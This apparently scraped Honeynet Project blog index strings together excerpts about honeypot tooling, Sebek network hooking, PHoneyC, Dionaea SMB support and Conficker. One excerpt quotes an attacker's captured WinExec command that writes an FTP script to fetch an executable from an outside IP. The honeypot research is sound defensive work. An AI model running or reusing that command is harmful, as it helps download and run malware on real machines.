- About us
- Code of Conduct
- Google SoC
- Recent posts
- Security Workshops
As the console spy is almost finished, the next stage is mainly for network activities. Sebek Win32 version uses TDI hook to get this done. However, since getting driver object in virtualization layer is hard and TDI is TDI is on the path to deprecation, I need to find another way. The best solution seems to be hooking NtDeviceIoControlFile, the API Windows uses to do network related stuff and has been widely mentioned in malware behavior analysis papers. After some days of searching, I encounter a very useful resources today, a master thesis from TTAnalyze team:
Yesterday, I got an incomplete, but successful, attack on my honeypot, the attackers remote code execution looked like this:
WinExec("cmd /c echo open 18.104.22.168 4871 > o&echo user 1 1 >> o &echo get msq16.exe >> o")
As the required part to download the malware to the remotehost was incomplete, I got curious and wanted a copy.
The Spanish Honeynet Project chapter primary areas of interest and development are wireless honeynets, web honeypots, data collecting and analyzing and research technical papers to inform the community. Our current members are:
The number of attacks against the Webhoneypot depends strongly on his PHP parser. So keeping the pattern matching mechanism up to date was one of the major future works. One of my goals for the Google Summer of Code time is to improve the parser and to reduce upcoming changes in attack patterns. The old parser was very simple: collect all lines containing echo calls, look for known patterns and generate the appropriate response.
While playing with the current hsoc code, I got attacked, and saw an offer to download something from somewhere.
Most of my work in the past few weeks has been focusing on the visualization aspect of the project. One thing that I am trying to avoid is simply making graphs/charts and that sort of visualization. Those sorts of things are incredibly useful since anyone can understand them, on the other hand they're trivial to make. I've been making a few basic visualizations, but the two that, so far, have the most merit are delinating the events based on color (each group of events is a separate color) and the other separates them based on height (each y position is a different event). I'll admi
Our work mainly focuses on DOM simulation. I believe the following is the most important for deobfuscation, but we also do lot more so that our program can handle normal web pages. We will not list them here.
Our code can be found at:
1. DOM tree generation.
During the last weeks I have been working on SMB and specifically DCERPC support for the Dionaea next generation low-interaction honeypot (buzz!).
SMB / CIFS is a huge protocol with several protocol versions and a lot of message types. The CIFS technical reference and the Implementing CIFS book have been constant companions for me since the beginning of the project.
Conficker contains a piece of code that has been object of speculation: It does not infect boxes located in the Ukraine. Before sending an exploit, it performs a lookup against Maxmind's GeoIP database, which is freely available, and skips the host if the returned country code is UA. While the B variant comes with a copy of the database embedded, the A variant downloads the file from Maxmind's server. A couple of days ago Felix had the idea to deliver a specially crafted database that maps every IP address to the Ukrain.
|Info:||See <https://www.honeynet.org/gsoc/project1> for
|Author:||Zhijie Chen (Joyan) <firstname.lastname@example.org>|
|Description:||Mid-term Report on PHoneyC GSoC project 1. This report
describes what I have done on the PHoneyC's libemu integration
for shellcode and heapspray detection during the first half of
the GSoC. Till now, the main ideas on this feature has been
fast-implemented (actually I mean poor coding style) and the
whole flow works well, with some code rewriting and performance
optimization needed in the future.